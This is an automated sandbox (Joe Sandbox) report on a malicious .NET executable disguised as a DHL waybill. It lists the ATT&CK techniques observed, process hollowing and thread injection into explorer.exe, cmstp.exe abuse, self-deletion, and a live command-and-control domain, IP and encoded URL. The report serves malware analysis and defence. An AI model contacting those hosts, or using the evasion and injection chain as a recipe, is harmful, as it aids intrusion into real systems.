          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script512
          Process Injection
          LSA Secrets1
          Remote System Discovery
          SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common1
          Deobfuscate/Decode Files or Information
          Cached Domain Credentials112
          System Information Discovery
          VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items4
          Obfuscated Files or Information
          DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job13
          Software Packing
          Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
          File Deletion
          /etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 635258 Sample: DHL WB# 2343640950.exe Startdate: 27/05/2022 Architecture: WINDOWS Score: 100 33 Found malware configuration 2->33 35 Malicious sample detected (through community Yara rule) 2->35 37 Multi AV Scanner detection for submitted file 2->37 39 7 other signatures 2->39 10 DHL WB# 2343640950.exe 3 2->10         started        process3 file4 29 C:\Users\user\...\DHL WB# 2343640950.exe.log, ASCII 10->29 dropped 13 DHL WB# 2343640950.exe 10->13         started        16 DHL WB# 2343640950.exe 10->16         started        process5 signatures6 51 Modifies the context of a thread in another process (thread injection) 13->51 53 Maps a DLL or memory area into another process 13->53 55 Sample uses process hollowing technique 13->55 57 Queues an APC in another process (thread injection) 13->57 18 explorer.exe 13->18 injected process7 dnsIp8 31 www.paycheckstubonlin.com 185.53.179.171, 49800, 80 TEAMINTERNET-ASDE Germany 18->31 41 System process connects to network (likely due to code injection or exploit) 18->41 22 cmstp.exe 18->22         started        signatures9 process10 signatures11 43 Self deletion via cmd or bat file 22->43 45 Modifies the context of a thread in another process (thread injection) 22->45 47 Maps a DLL or memory area into another process 22->47 49 Tries to detect virtualization through RDTSC time measurements 22->49 25 cmd.exe 1 22->25         started        process12 process13 27 conhost.exe 25->27         started       

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          DHL WB# 2343640950.exe48%VirustotalBrowse
          DHL WB# 2343640950.exe22%ReversingLabsByteCode-MSIL.Spyware.Noon
          No Antivirus matches
          SourceDetectionScannerLabelLinkDownload
          5.0.DHL WB# 2343640950.exe.400000.8.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          5.0.DHL WB# 2343640950.exe.400000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          5.0.DHL WB# 2343640950.exe.400000.6.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          5.2.DHL WB# 2343640950.exe.1383ee0.2.unpack100%AviraHEUR/AGEN.1234539Download File
          5.2.DHL WB# 2343640950.exe.3740000.5.unpack100%AviraHEUR/AGEN.1234539Download File
          13.0.cmstp.exe.1250000.0.unpack100%AviraHEUR/AGEN.1234539Download File
          13.2.cmstp.exe.1250000.0.unpack100%AviraHEUR/AGEN.1234539Download File
          5.2.DHL WB# 2343640950.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          No Antivirus matches
          SourceDetectionScannerLabelLink
          http://www.galapagosdesign.com/0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.sajatypeworks.com40%Avira URL Cloudsafe
          http://www.sajatypeworks.comw0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.carterandcone.com0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.carterandcone.comttp0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.fontbureau.comgrita0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.paycheckstubonlin.com/183b/?3f=0pQLi&GTWHLhf=aeRI+VtYzSQE3A1d41SuiJFmY5rxFnxGMgk+ebPO7waK3tnPCQEIkRgDBSC82MoPtV6fY2DLrg==0%Avira URL Cloudsafe
          www.studiomayuko.com/183b/0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.sajatypeworks.comhy/0%Avira URL Cloudsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.fonts.comT?0%Avira URL Cloudsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sajatypeworks.com&0%Avira URL Cloudsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.fonts.com80%URL Reputationsafe
          http://www.founder.com.cn/cn%0%URL Reputationsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          www.paycheckstubonlin.com
          185.53.179.171
          truefalse
            high
            NameMaliciousAntivirus DetectionReputation
            http://www.paycheckstubonlin.com/183b/?3f=0pQLi&GTWHLhf=aeRI+VtYzSQE3A1d41SuiJFmY5rxFnxGMgk+ebPO7waK3tnPCQEIkRgDBSC82MoPtV6fY2DLrg==true
            • Avira URL Cloud: safe
            unknown
            www.studiomayuko.com/183b/true
            • Avira URL Cloud: safe
            low
            NameSourceMaliciousAntivirus DetectionReputation
            http://www.apache.org/licenses/LICENSE-2.0DHL WB# 2343640950.exe, 00000000.00000002.427842888.00000000067B2000.00000004.00000800.00020000.00000000.sdmp, DHL WB# 2343640950.exe, 00000000.00000003.375029769.00000000055B2000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              http://www.fontbureau.comDHL WB# 2343640950.exe, 00000000.00000002.427842888.00000000067B2000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                http://www.fontbureau.com/designersGDHL WB# 2343640950.exe, 00000000.00000002.427842888.00000000067B2000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  http://www.galapagosdesign.com/DHL WB# 2343640950.exe, 00000000.00000003.386580488.00000000055E5000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://www.fontbureau.com/designers/?DHL WB# 2343640950.exe, 00000000.00000002.427842888.00000000067B2000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    http://www.founder.com.cn/cn/bTheDHL WB# 2343640950.exe, 00000000.00000002.427842888.00000000067B2000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://www.sajatypeworks.com4DHL WB# 2343640950.exe, 00000000.00000003.371017515.00000000055DD000.00000004.00000800.00020000.00000000.sdmp, DHL WB# 2343640950.exe, 00000000.00000003.370858429.00000000055DE000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://www.fontbureau.com/designers?DHL WB# 2343640950.exe, 00000000.00000002.427842888.00000000067B2000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      http://www.sajatypeworks.comwDHL WB# 2343640950.exe, 00000000.00000003.371017515.00000000055DD000.00000004.00000800.00020000.00000000.sdmp, DHL WB# 2343640950.exe, 00000000.00000003.370840690.00000000055DD000.00000004.00000800.00020000.00000000.sdmp, DHL WB# 2343640950.exe, 00000000.00000003.370858429.00000000055DE000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://www.tiro.comDHL WB# 2343640950.exe, 00000000.00000002.427842888.00000000067B2000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://www.fontbureau.com/designersDHL WB# 2343640950.exe, 00000000.00000002.427842888.00000000067B2000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        http://www.goodfont.co.krDHL WB# 2343640950.exe, 00000000.00000002.427842888.00000000067B2000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.carterandcone.comDHL WB# 2343640950.exe, 00000000.00000003.377133904.00000000055A7000.00000004.00000800.00020000.00000000.sdmp, DHL WB# 2343640950.exe, 00000000.00000003.377503899.00000000055A7000.00000004.00000800.00020000.00000000.sdmp, DHL WB# 2343640950.exe, 00000000.00000003.378545531.00000000055A8000.00000004.00000800.00020000.00000000.sdmp, DHL WB# 2343640950.exe, 00000000.00000003.376858559.00000000055A6000.00000004.00000800.00020000.00000000.sdmp, DHL WB# 2343640950.exe, 00000000.00000003.378033564.00000000055A6000.00000004.00000800.00020000.00000000.sdmp, DHL WB# 2343640950.exe, 00000000.00000003.377574826.00000000055A6000.00000004.00000800.00020000.00000000.sdmp, DHL WB# 2343640950.exe, 00000000.00000003.378644300.00000000055A8000.00000004.00000800.00020000.00000000.sdmp, DHL WB# 2343640950.exe, 00000000.00000003.376377568.00000000055A4000.00000004.00000800.00020000.00000000.sdmp, DHL WB# 2343640950.exe, 00000000.00000003.378324382.00000000055A8000.00000004.00000800.00020000.00000000.sdmp, DHL WB# 2343640950.exe, 00000000.00000003.376750190.00000000055A4000.00000004.00000800.00020000.00000000.sdmp, DHL WB# 2343640950.exe, 00000000.00000003.377095056.00000000055A7000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.carterandcone.comlDHL WB# 2343640950.exe, 00000000.00000002.427842888.00000000067B2000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.sajatypeworks.comDHL WB# 2343640950.exe, 00000000.00000003.371017515.00000000055DD000.00000004.00000800.00020000.00000000.sdmp, DHL WB# 2343640950.exe, 00000000.00000002.427842888.00000000067B2000.00000004.00000800.00020000.00000000.sdmp, DHL WB# 2343640950.exe, 00000000.00000003.370840690.00000000055DD000.00000004.00000800.00020000.00000000.sdmp, DHL WB# 2343640950.exe, 00000000.00000003.370831210.00000000055DD000.00000004.00000800.00020000.00000000.sdmp, DHL WB# 2343640950.exe, 00000000.00000003.370858429.00000000055DE000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.typography.netDDHL WB# 2343640950.exe, 00000000.00000002.427842888.00000000067B2000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.fontbureau.com/designers/cabarga.htmlNDHL WB# 2343640950.exe, 00000000.00000002.427842888.00000000067B2000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://www.founder.com.cn/cn/cTheDHL WB# 2343640950.exe, 00000000.00000002.427842888.00000000067B2000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.carterandcone.comttpDHL WB# 2343640950.exe, 00000000.00000003.377133904.00000000055A7000.00000004.00000800.00020000.00000000.sdmp, DHL WB# 2343640950.exe, 00000000.00000003.377503899.00000000055A7000.00000004.00000800.00020000.00000000.sdmp, DHL WB# 2343640950.exe, 00000000.00000003.378545531.00000000055A8000.00000004.00000800.00020000.00000000.sdmp, DHL WB# 2343640950.exe, 00000000.00000003.380503275.00000000055A7000.00000004.00000800.00020000.00000000.sdmp, DHL WB# 2343640950.exe, 00000000.00000003.376858559.00000000055A6000.00000004.00000800.00020000.00000000.sdmp, DHL WB# 2343640950.exe, 00000000.00000003.379031205.00000000055A8000.00000004.00000800.00020000.00000000.sdmp, DHL WB# 2343640950.exe, 00000000.00000003.378033564.00000000055A6000.00000004.00000800.00020000.00000000.sdmp, DHL WB# 2343640950.exe, 00000000.00000003.377574826.00000000055A6000.00000004.00000800.00020000.00000000.sdmp, DHL WB# 2343640950.exe, 00000000.00000003.378644300.00000000055A8000.00000004.00000800.00020000.00000000.sdmp, DHL WB# 2343640950.exe, 00000000.00000003.376377568.00000000055A4000.00000004.00000800.00020000.00000000.sdmp, DHL WB# 2343640950.exe, 00000000.00000003.378324382.00000000055A8000.00000004.00000800.00020000.00000000.sdmp, DHL WB# 2343640950.exe, 00000000.00000003.381687286.00000000055A6000.00000004.00000800.00020000.00000000.sdmp, DHL WB# 2343640950.exe, 00000000.00000003.376750190.00000000055A4000.00000004.00000800.00020000.00000000.sdmp, DHL WB# 2343640950.exe, 00000000.00000003.377095056.00000000055A7000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.galapagosdesign.com/staff/dennis.htmDHL WB# 2343640950.exe, 00000000.00000002.427842888.00000000067B2000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://fontfabrik.comDHL WB# 2343640950.exe, 00000000.00000002.427842888.00000000067B2000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.fontbureau.comgritaDHL WB# 2343640950.exe, 00000000.00000002.427545975.00000000055A0000.00000004.00000800.00020000.00000000.sdmp, DHL WB# 2343640950.exe, 00000000.00000003.420192767.00000000055A0000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.founder.com.cn/cnDHL WB# 2343640950.exe, 00000000.00000003.374059324.00000000055AF000.00000004.00000800.00020000.00000000.sdmp, DHL WB# 2343640950.exe, 00000000.00000002.427842888.00000000067B2000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.fontbureau.com/designers/frere-jones.htmlDHL WB# 2343640950.exe, 00000000.00000003.383046028.00000000055D4000.00000004.00000800.00020000.00000000.sdmp, DHL WB# 2343640950.exe, 00000000.00000003.383254350.00000000055D4000.00000004.00000800.00020000.00000000.sdmp, DHL WB# 2343640950.exe, 00000000.00000003.383176460.00000000055D4000.00000004.00000800.00020000.00000000.sdmp, DHL WB# 2343640950.exe, 00000000.00000003.383369016.00000000055D4000.00000004.00000800.00020000.00000000.sdmp, DHL WB# 2343640950.exe, 00000000.00000002.427842888.00000000067B2000.00000004.00000800.00020000.00000000.sdmp, DHL WB# 2343640950.exe, 00000000.00000003.383430136.00000000055D4000.00000004.00000800.00020000.00000000.sdmp, DHL WB# 2343640950.exe, 00000000.00000003.383112465.00000000055D4000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://www.jiyu-kobo.co.jp/DHL WB# 2343640950.exe, 00000000.00000002.427842888.00000000067B2000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.galapagosdesign.com/DPleaseDHL WB# 2343640950.exe, 00000000.00000002.427842888.00000000067B2000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.fontbureau.com/designers8DHL WB# 2343640950.exe, 00000000.00000002.427842888.00000000067B2000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://www.fonts.comDHL WB# 2343640950.exe, 00000000.00000002.427842888.00000000067B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://www.sajatypeworks.comhy/DHL WB# 2343640950.exe, 00000000.00000003.370858429.00000000055DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.sandoll.co.krDHL WB# 2343640950.exe, 00000000.00000002.427842888.00000000067B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.fonts.comT?DHL WB# 2343640950.exe, 00000000.00000003.371854007.00000000055DD000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.urwpp.deDPleaseDHL WB# 2343640950.exe, 00000000.00000002.427842888.00000000067B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.zhongyicts.com.cnDHL WB# 2343640950.exe, 00000000.00000002.427842888.00000000067B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.sajatypeworks.com&DHL WB# 2343640950.exe, 00000000.00000003.371017515.00000000055DD000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                low
                                http://www.fontbureau.com/designerspDHL WB# 2343640950.exe, 00000000.00000003.382147355.00000000055A9000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://www.sakkal.comDHL WB# 2343640950.exe, 00000000.00000002.427842888.00000000067B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.fontbureau.com/designers/DHL WB# 2343640950.exe, 00000000.00000003.382147355.00000000055A9000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://www.fonts.com8DHL WB# 2343640950.exe, 00000000.00000003.371964876.00000000055DD000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.founder.com.cn/cn%DHL WB# 2343640950.exe, 00000000.00000003.374059324.00000000055AF000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs
                                    IPDomainCountryFlagASNASN NameMalicious
                                    185.53.179.171
                                    www.paycheckstubonlin.comGermany
                                    61969TEAMINTERNET-ASDEfalse
                                    Joe Sandbox Version:34.0.0 Boulder Opal
                                    Analysis ID:635258
                                    Start date and time: 27/05/202217:56:262022-05-27 17:56:26 +02:00
                                    Joe Sandbox Product:CloudBasic
                                    Overall analysis duration:0h 13m 18s
                                    Hypervisor based Inspection enabled:false
                                    Report type:light
                                    Sample file name:DHL WB# 2343640950.exe
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                    Number of analysed new started processes analysed:22
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:1
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • HDC enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Detection:MAL
                                    Classification:mal100.troj.evad.winEXE@9/1@1/1
                                    EGA Information:
                                    • Successful, ratio: 75%
                                    HDC Information:
                                    • Successful, ratio: 23% (good quality ratio 20.2%)
                                    • Quality average: 68.3%
                                    • Quality standard deviation: 33.6%
                                    HCA Information:
                                    • Successful, ratio: 100%
                                    • Number of executed functions: 0
                                    • Number of non-executed functions: 0
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Adjust boot time
                                    • Enable AMSI
                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                    • Excluded domains from analysis (whitelisted): www.bing.com, ris.api.iris.microsoft.com, client.wns.windows.com, fs.microsoft.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                    • Execution Graph export aborted for target DHL WB# 2343640950.exe, PID 6376 because there are no executed function
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                    TimeTypeDescription
                                    17:57:49API Interceptor2x Sleep call for process: DHL WB# 2343640950.exe modified
                                    No context
                                    No context
                                    No context
                                    No context
                                    No context
                                    Process:C:\Users\user\Desktop\DHL WB# 2343640950.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):2148
                                    Entropy (8bit):5.349175784572625
                                    Encrypted:false
                                    SSDEEP:48:MxHKXeHKlEHU0YHKhQnouHIW7HKjAHKx1qHitHoxHhAHKzvFHxvAHj:iqXeqm00YqhQnouRqjAqxwCtIxHeqzNI
                                    MD5:945DECF362D4312BCF2BC59AAB588224
                                    SHA1:B8A9CD1EC92D5778D394F7F564CA4EB5D83BAE6A
                                    SHA-256:D85162B3E02C7B540C88441C74C2B7AD0270D70CA94A960BE08C31B2BA53DFE6
                                    SHA-512:300B7409CC405BDE24C2FAA3419E4C5CD0F35CAE57EBB66EE76E1CC731F1C48E395FB6CA5937E29F354D99EDCA27FE16CD4D2C59AE65598391695ECCD23B47B8
                                    Malicious:true
                                    Reputation:unknown
                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\820a27781e8540ca263d835ec155f1a5\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\889128adc9a7c9370e5e293f65060164\PresentationFramework.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Wi
                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Entropy (8bit):7.853412902188726
                                    TrID:
                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                    • Win32 Executable (generic) a (10002005/4) 49.75%
                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                    • Windows Screen Saver (13104/52) 0.07%
                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                    File name:DHL WB# 2343640950.exe
                                    File size:708608
                                    MD5:81e4012e3036befd629438ace2e798e2
                                    SHA1:d5b34d7dd4d4255fd3279bdd99c98b9e760bb34c
                                    SHA256:bcd31729e663369b99fd178377977c5de078512046d2cb4b38c51d80d9801374
                                    SHA512:7177aefff308114d491876111933db7a30acf312b9d330b01e2ffcc3915aac1af5794cee04e7c1abc8c1088998df560a5afa7de57bc03242eaf376a2f7d236f2
                                    SSDEEP:12288:jML1Aw768uPZbHoViBdtz4X6RfBnlw/lqOqUC03Ojrx/4c/6bTmA:jML17MZbHoVivtzhf5lw/lq1XoK3/6v/
                                    TLSH:49E4122D22EC0628FBFE5B7E10B95500077AAB4B6117D70F5EC574D82C83B524E16BAB
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b..............0......D........... ........@.. .......................@............@................................
                                    Icon Hash:ccaacecccca8aecc
                                    Entrypoint:0x4aa8de
                                    Entrypoint Section:.text
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                    DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                    Time Stamp:0x628F0D1D [Thu May 26 05:16:13 2022 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:v4.0.30319
                                    OS Version Major:4
                                    OS Version Minor:0
                                    File Version Major:4
                                    File Version Minor:0
                                    Subsystem Version Major:4
                                    Subsystem Version Minor:0
                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                    Instruction
                                    jmp dword ptr [00402000h]
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    or al, byte ptr [eax]
                                    add byte ptr [eax], al
                                    adc al, 00h
                                    add byte ptr [eax], al
                                    push ds
                                    add byte ptr [eax], al
                                    add byte ptr [eax], ch
                                    add byte ptr [eax], al
                                    add byte ptr [eax+eax], bh
                                    add byte ptr [eax], al
                                    push eax
                                    add byte ptr [eax], al
                                    add al, ch
                                    add eax, dword ptr [eax]
                                    add al, ch
                                    add eax, dword ptr [eax]
                                    add byte ptr [eax+00h], dl
                                    add byte ptr [eax], al
                                    cmp al, 00h
                                    add byte ptr [eax], al
                                    sub byte ptr [eax], al
                                    add byte ptr [eax], al
                                    push ds
                                    add byte ptr [eax], al
                                    add byte ptr [eax+eax], dl
                                    add byte ptr [eax], al
                                    or al, byte ptr [eax]
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add dword ptr [eax], eax
                                    add byte ptr [eax], al
                                    add eax, dword ptr [eax]
                                    add byte ptr [eax], al
                                    add eax, 07000000h
                                    add byte ptr [eax], al
                                    add byte ptr [eax], cl
                                    add byte ptr [eax], al
                                    add byte ptr [edx], cl
                                    add byte ptr [eax], al
                                    add byte ptr [eax+eax], cl
                                    add byte ptr [eax], al
                                    push cs
                                    add byte ptr [eax], al
                                    add byte ptr [ecx], dl
                                    add byte ptr [eax], al
                                    add byte ptr [ebx], dl
                                    add byte ptr [eax], al
                                    add byte ptr [17000000h], dl
                                    add byte ptr [eax], al
                                    add byte ptr [eax], bl
                                    add byte ptr [eax], al
                                    add byte ptr [edx], bl
                                    add byte ptr [eax], al
                                    add byte ptr [eax+eax], bl
                                    add byte ptr [eax], al
                                    push ds
                                    add byte ptr [eax], al
                                    add byte ptr [ecx], ah
                                    add byte ptr [eax], al
                                    add byte ptr [ebx], ah
                                    add byte ptr [eax], al
                                    add byte ptr [27000000h], ah
                                    add byte ptr [eax], al
                                    add byte ptr [eax], ch
                                    add byte ptr [eax], al
                                    add byte ptr [edx], ch
                                    add byte ptr [eax], al
                                    add byte ptr [eax+eax], ch
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [ecx], dh
                                    add byte ptr [eax], al
                                    add byte ptr [ebx], dh
                                    add byte ptr [eax], al
                                    add byte ptr [37000000h], dh
                                    add byte ptr [eax], al
                                    add byte ptr [eax], bh
                                    add byte ptr [eax], al
                                    add byte ptr [edx], bh
                                    add byte ptr [eax], al
                                    add byte ptr [eax+eax], bh
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xaa88c0x4f.text
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xac0000x4110.rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0xb20000xc.reloc
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    .text0x20000xa89a40xa8a00False0.894545728317data7.85849718872IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                    .rsrc0xac0000x41100x4200False0.947620738636data7.78997497493IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .reloc0xb20000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                    NameRVASizeTypeLanguageCountry
                                    RT_ICON0xac0c80x3cb9PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                    RT_GROUP_ICON0xafd940x14data
                                    RT_VERSION0xafdb80x354data
                                    DLLImport
                                    mscoree.dll_CorExeMain
                                    DescriptionData
                                    Translation0x0000 0x04b0
                                    LegalCopyrightCopyright Karel Pospil 2011
                                    Assembly Version1.1.0.0
                                    InternalNameFixupD.exe
                                    FileVersion1.0.0.0
                                    CompanyName
                                    LegalTrademarksGothic
                                    Comments
                                    ProductNameGothic Checkers
                                    ProductVersion1.0.0.0
                                    FileDescriptionGothic Checkers
